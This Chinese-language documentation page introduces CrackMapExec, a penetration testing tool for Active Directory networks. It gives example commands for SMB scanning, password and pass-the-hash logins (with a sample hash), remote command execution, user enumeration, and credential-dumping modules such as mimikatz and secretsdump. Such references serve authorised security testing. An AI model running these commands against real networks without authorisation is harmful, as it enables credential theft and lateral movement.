---
title: "CrackMapExec"
weight: 60
description: "内网渗透测试框架"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## CrackMapExec

CrackMapExec (CME) 是一款内网渗透测试框架，专为 Active Directory/域环境设计。

## 基础使用

### SMB 扫描
```bash
crackmapexec smb 192.168.1.0/24
```

### 凭证测试
```bash
crackmapexec smb 192.168.1.0/24 -u user -p pass
```

### 哈希传递
```bash
crackmapexec smb 192.168.1.0/24 -u user -H HASH
```

### 执行命令
```bash
crackmapexec smb 192.168.1.0/24 -u user -p pass -x "whoami"
```

### 枚举用户
```bash
crackmapexec smb 192.168.1.0/24 -u user -p pass --users
```

## 常用参数

| 参数 | 描述 |
|------|------|
| -u | 用户名 |
| -p | 密码 |
| -H | 哈希 |
| -x | 执行命令 |
| -M | 使用模块 |
| --users | 枚举用户 |
| --groups | 枚举组 |
| --computers | 枚举计算机 |

## 功能特性

- **SMB 协议** - SMB 扫描和利用
- **WMI 协议** - WMI 远程执行
- **WinRM 协议** - PowerShell 远程
- **MSSQL 协议** - 数据库渗透
- **LDAP 协议** - 目录服务枚举

## 常用模块

| 模块 | 描述 |
|------|------|
| mimikatz | 凭证提取 |
| secretsdump | 凭证转储 |
| met_inject | Meterpreter 注入 |
| empire | Empire 集成 |
| rdp | RDP 检查 |

## 使用示例

```bash
# 扫描整个网段
crackmapexec smb 10.0.0.0/24

# 使用哈希传递
crackmapexec smb 10.0.0.0/24 -u admin -H 32ed87bdb5fdc5e9cba88547376818d4

# 执行 PowerShell 命令
crackmapexec smb 10.0.0.0/24 -u admin -p password -x "whoami" -o PS

# 使用模块
crackmapexec smb 10.0.0.0/24 -u admin -p password -M mimikatz
```

## 参考资源

- [CrackMapExec GitHub](https://github.com/byt3bl33d3r/CrackMapExec)